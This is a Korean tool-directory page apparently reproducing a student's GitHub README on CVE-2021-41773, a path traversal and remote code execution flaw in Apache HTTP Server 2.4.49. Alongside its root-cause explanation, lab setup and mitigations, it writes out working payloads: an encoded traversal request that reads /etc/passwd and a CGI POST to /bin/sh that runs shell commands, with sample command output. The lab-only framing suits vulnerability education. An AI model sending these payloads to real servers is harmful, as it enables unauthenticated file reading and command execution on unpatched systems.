Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
APACHE-PATH-TRAVERSAL-RCE-CVE-2021-41773- — CVE-2021-41773(Apache HTTP Server 2.4.49)에 대한 포괄적인 분석으로, 취약점 연구, 통제된 실험실 기반 익스플로잇, 개념 증명(PoC) 개발, 근본 원인 분석 및 교육 및 방어 보안 목적의 완화 전략을 제공합니다. | Kitploit
도구/GitHubGitHub/abds059/apache-path-traversal-rce-cve-2021-41773-
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubabds059/apache-path-traversal-rce-cve-2021-41773-

APACHE-PATH-TRAVERSAL-RCE-CVE-2021-41773-

CVE-2021-41773(Apache HTTP Server 2.4.49)에 대한 포괄적인 분석으로, 취약점 연구, 통제된 실험실 기반 익스플로잇, 개념 증명(PoC) 개발, 근본 원인 분석 및 교육 및 방어 보안 목적의 완화 전략을 제공합니다.

저장소 보기
55개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2021-41773 — Apache HTTP Server 2.4.49 경로 탐색 / 원격 코드 실행

Apache CVE CVSS Python Docker Lab Only

교육 연구 프로젝트입니다. 모든 테스트는 격리된 Docker 랩에서 수행되었습니다. 소유하지 않은 시스템에 대해 사용하지 마십시오.


취약점 요약

필드세부 정보
CVE IDCVE-2021-41773
영향받는 소프트웨어Apache HTTP Server 2.4.49만
취약점 유형경로 탐색 → 원격 코드 실행
CVSS 점수9.8 (심각)
공개일2021년 10월
수정 버전Apache 2.4.51

근본 원인

Apache 2.4.49는 액세스 제어 규칙을 적용하기 전에 URL 인코딩된 경로 시퀀스(%2e%2e)를 올바르게 정규화하지 못합니다. 이로 인해 공격자가 웹 루트 외부로 탐색할 수 있습니다. CGI가 활성화된 경우, 탐색을 /bin/sh로 지정하고 POST 본문을 통해 셸 명령을 제공하면 인증되지 않은 원격 코드 실행이 발생합니다.


저장소 내용

root@kitploit:~
cve-2021-41773-poc/
├── Dockerfile      # Intentionally vulnerable Apache 2.4.49 lab container
├── exploit.py      # Python PoC — uses raw sockets to preserve %2e encoding
├── SETUP.md        # Step-by-step lab setup guide
├── README.md       # This file
└── report.pdf      # Full exploit development report

빠른 시작

1. 취약한 컨테이너 빌드 및 실행

root@kitploit:~
docker build -t apache-vuln-2449 .
docker run -d -p 8080:80 --name vuln-apache apache-vuln-2449

2. 익스플로잇 실행

root@kitploit:~
python3 exploit.py

3. 예상 출력

root@kitploit:~
==================================================
 CVE-2021-41773 PoC — Lab Use Only
==================================================
[+] Target reachable — HTTP 200

[*] Path Traversal — Reading /etc/passwd
[*] Status: 403
[-] Blocked (403) — server restrictions in place

[*] RCE — Executing: id
[*] Status: 200
[+] OUTPUT:
uid=1(daemon) gid=1(daemon) groups=1(daemon)

[*] RCE — Executing: whoami
[*] Status: 200
[+] OUTPUT:
daemon

[*] RCE — Executing: hostname
[*] Status: 200
[+] OUTPUT:
e4ccca07bee7

전체 설정 지침 및 문제 해결은 SETUP.md를 참조하세요.


익스플로잇 작동 방식

requests 라이브러리는 전송 전에 %2e → .로 정규화하여 익스플로잇이 실패합니다(400 반환). 이 PoC는 raw 소켓을 사용하여 HTTP 요청을 바이트 단위로 전송하며, Apache 2.4.49가 수신해야 하는 정확한 인코딩된 탐색 시퀀스를 유지합니다.

탐색 페이로드:

root@kitploit:~
GET /.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1

RCE 페이로드:

root@kitploit:~
POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
...
echo Content-Type: text/plain; echo; id

Apache는 ACL 검사 전에 %2e%2e를 디코딩하지 못해 요청을 처리하고 CGI를 통해 라우팅한 후 POST 본문을 셸 명령으로 실행합니다.


완화 방법

  • 업그레이드 Apache를 2.4.51 이상으로
  • CGI 비활성화 (엄격히 필요하지 않은 경우)
  • /에 Require all granted 사용 금지
  • 보안 패치를 출시 즉시 적용

참고 자료

  • CVE-2021-41773 — MITRE
  • Apache Security Advisory
  • ExploitDB #50383
  • Rapid7 Analysis
  • PayloadsAllTheThings

저자

Abdur Rehman Siddiqui
익스플로잇 개발 — 과제 3


이 저장소는 교육 목적으로만 제공됩니다. 작성자는 이 자료의 오용에 대해 책임을 지지 않습니다.

도구 다운로드